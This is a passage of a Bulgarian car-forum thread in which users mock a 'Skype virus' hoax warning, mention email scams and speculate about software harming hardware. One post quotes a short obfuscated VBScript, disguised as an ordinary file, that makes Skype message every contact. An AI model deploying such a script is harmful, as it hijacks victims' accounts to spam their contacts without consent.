Реклама

Collapse

Съобщение

Collapse
No announcement yet.

ВНИМАНИЕ!!! Скайп Вирус!

Collapse
X

• Филтър
  • Час
  • Покажи
Clear All
new posts

Mindzu написа:
    gendo написа:
    ебаси ,има ли хора които се връзват още на тия глупости Yellow_Flash_Colorz_PDT_30
    Има и винаги ще ги има.
    Щом чак тема се пусна .......
    Fiat Bravo 1.2 16v/82 hp....

...E90..incoming..!!

Коментар

ако си хлапе или с лапешки акъл, и нещо искаш да правиш мръсно на martin_ludiq пускаш такова съобщение... за да не говорят с него другите ... все едно той не може да си смени ника или регистрацията ... не знам доколко е реалистично софтуеър да може да повреди хардуеър - както се твърди в повечето такива ...
      Брава 1,6 16V; Джанти 16-ки - по договаряне - 4 бр.:
      http://forum.fiat-bg.org/viewtopic.php?t=88126

Коментар

Тези пак са безобидни но има обикновено по пощата "SCUM", които са на принципа с ваучерите за телефони или роднина с проблеми и нужда да пратите пари на адвокат ... което е вид интелигентен спам и винаги там е по-страшно ако някой се върже...
        Брава 1,6 16V; Джанти 16-ки - по договаряне - 4 бр.:
        http://forum.fiat-bg.org/viewtopic.php?t=88126

Коментар

niko_ymn написа:
          ако си хлапе или с лапешки акъл, и нещо искаш да правиш мръсно на martin_ludiq пускаш такова съобщение... за да не говорят с него другите ... все едно той не може да си смени ника или регистрацията ... не знам доколко е реалистично софтуеър да може да повреди хардуеър - както се твърди в повечето такива ...
          Ми напълно възможно е софтуерно да ти овърклокнат процесора.Друг въпрос е колко хора го могат и имат желание да го направят.

Коментар

SHB написа:
            Тегля си аз някакво файлче,не помня за какво ,цъквам два пъти и о’чудо!Изпрати съобщение на целия ми контакте лист...Колко съм писал че е спам-изтри ми се клавиатурата.Някакво просто скриптче с променено разширение колко може да ти вгорчи живота.
            Код:
            set NrrlP = WScript.CreateObject("Scripting.FileSystemObject")set uDlVA = wscript.createobject("wscript.shell")set yADAl = WScript.CreateObject("Skype4COM.Skype", "Skype_")yADAl.Client.Start()yADAl.Attach()For Each GAG In yADAl.FriendsyADAl.SendMessage GAG.handle,"some text here*  "nextmsgbox "bY Spamer URL (’’)"

Коментар

niko_ymn написа:
              не знам доколко е реалистично софтуеър да може да повреди хардуеър - както се твърди в повечето такива ...
              Софтуерно можеш да "заключиш" да не ти се отваря ЦД-то примерно. В линукса това си е по дефаулт. Докато не го ънмаунтнеш не можеш да си извадиш диска.Айде сега си представи, че скрипт "накара" главите на харда да се паркират (примерно) 10-тина пъти в секунда. Колко ли време ще издържи?
              Alfa 159 SW 2.4 Ti
              Fiat Marea '99 1.6 16V ELX
              "...внимавай че тези италиански кочини много вървят."

Коментар

Незнам тези но е тоя спам ще обиколи света за нула време http://www.marica-iztok.com/jaro/To_all_my_friend.html
                Правило № 1- Нещо което работи не се пипа!!!
                Правило № 2- На майстори и наркОмани вяра да нямаш!
                Правило № 3- Винаги спазвай правило № 1

Коментар

Working...
                X